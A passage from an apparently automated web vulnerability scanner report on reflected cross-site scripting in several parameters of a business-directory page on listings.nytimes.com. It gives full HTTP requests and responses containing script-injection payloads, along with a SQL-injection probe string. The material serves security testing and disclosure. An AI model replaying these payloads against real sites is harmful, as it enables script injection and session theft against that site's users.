527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-55590229321"><script>alert(1)</script>8fd183e334c4295ee&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91521
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=BHDDEGAACEMCKDLLCGDILBFD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsQ" value="125-512454,125-531166,125-510950,125-519482,125-550392,125-486912,125-560934,125-555722,125-562036,125-55590229321"><script>alert(1)</script>8fd183e334c4295ee">
...[SNIP]...

4.307. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsQ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsQ request parameter is copied into the HTML document as plain text between tags. The payload 9085f<script>alert(1)</script>14bc43c923e was submitted in the sLsIdsQ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-5559029085f<script>alert(1)</script>14bc43c923e&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:45:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-5559029085f<script>alert(1)</script>14bc43c923e&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-
...[SNIP]...

4.308. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsR request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b64"><script>alert(1)</script>9800589bcb57d1dbc was submitted in the sLsIdsR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935a8b64"><script>alert(1)</script>9800589bcb57d1dbc&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91415
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=HILKNADAAGLBBCILJBKMAMOE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsR" value="125-493413,125-548107,125-566195,125-549209,125-496651,125-550801,125-551463,125-564528,125-544691,125-511935a8b64"><script>alert(1)</script>9800589bcb57d1dbc">
...[SNIP]...

4.309. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsR request parameter is copied into the HTML document as plain text between tags. The payload ce3fd<script>alert(1)</script>3284d4f265c was submitted in the sLsIdsR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935ce3fd<script>alert(1)</script>3284d4f265c&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:46:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCQRTDT=FLFPHCHALDGMPNMNDKDHMBAI; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935ce3fd<script>alert(1)</script>3284d4f265c&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-
...[SNIP]...

4.310. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83e2"><script>alert(1)</script>ab00739b2398d4c3e was submitted in the sLsIdsS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507a83e2"><script>alert(1)</script>ab00739b2398d4c3e&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c